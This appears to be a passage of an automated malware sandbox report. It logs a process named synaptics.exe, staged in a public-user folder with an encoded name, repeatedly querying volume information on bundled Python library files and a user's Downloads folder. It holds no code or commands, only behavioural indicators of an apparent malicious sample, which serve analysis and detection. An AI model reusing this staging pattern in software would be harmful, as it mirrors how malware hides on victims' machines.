            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\types.cpython-310.pyc.37182400 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\sre_compile.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\sre_compile.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\sre_compile.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\sre_compile.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\sre_compile.cpython-310.pyc.37136968 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\sre_parse.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\sre_parse.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\sre_parse.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\sre_parse.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\sre_parse.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\sre_parse.cpython-310.pyc.27672992 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\sre_constants.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\sre_constants.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\sre_constants.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\sre_constants.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\sre_constants.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\sre_constants.cpython-310.pyc.27807776 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\functools.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\functools.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\functools.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\functools.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\functools.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\functools.cpython-310.pyc.27673280 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\collections\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\collections\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\collections\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\collections\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\collections\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\collections VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\keyword.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\keyword.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\keyword.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\keyword.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\keyword.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\keyword.cpython-310.pyc.27673568 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\operator.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\operator.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\operator.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\operator.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\operator.cpython-310.pyc.27675776 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\reprlib.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\reprlib.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\reprlib.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\reprlib.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\reprlib.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\reprlib.cpython-310.pyc.27675968 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\copyreg.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\copyreg.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\copyreg.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\copyreg.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\copyreg.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\copyreg.cpython-310.pyc.27675968 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\struct.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\struct.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\struct.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\struct.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\struct.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\struct.cpython-310.pyc.27676256 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\bisect.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\bisect.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\bisect.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\bisect.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\bisect.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\bisect.cpython-310.pyc.27676544 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\hashlib.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\hashlib.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\hashlib.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\hashlib.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\hashlib.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\hashlib.cpython-310.pyc.28008480 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs\_hashlib.pyd VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\http\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\http\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\http\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\http\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\http\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\http VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\http\__pycache__\__init__.cpython-310.pyc.27793784 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\http VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\http VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\http VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\http\client.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\http\client.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\http\client.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\http\client.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\http\client.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\http\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\http\__pycache__\client.cpython-310.pyc.27792432 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\parser.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\parser.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\parser.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\parser.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\parser.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__\parser.cpython-310.pyc.28077344 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\feedparser.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\feedparser.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\feedparser.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\feedparser.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\feedparser.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__\feedparser.cpython-310.pyc.41620528 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\errors.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\errors.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\errors.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\errors.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\errors.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__\errors.cpython-310.pyc.41623336 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\_policybase.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\_policybase.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\_policybase.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\_policybase.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\_policybase.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__\_policybase.cpython-310.pyc.41655272 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\header.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\header.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\header.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\header.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\header.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__\header.cpython-310.pyc.41655792 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\quoprimime.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\quoprimime.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\quoprimime.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\quoprimime.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\quoprimime.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__\quoprimime.cpython-310.pyc.41679016 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\string.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\string.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\string.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\string.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\string.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\string.cpython-310.pyc.28010016 VolumeInformation
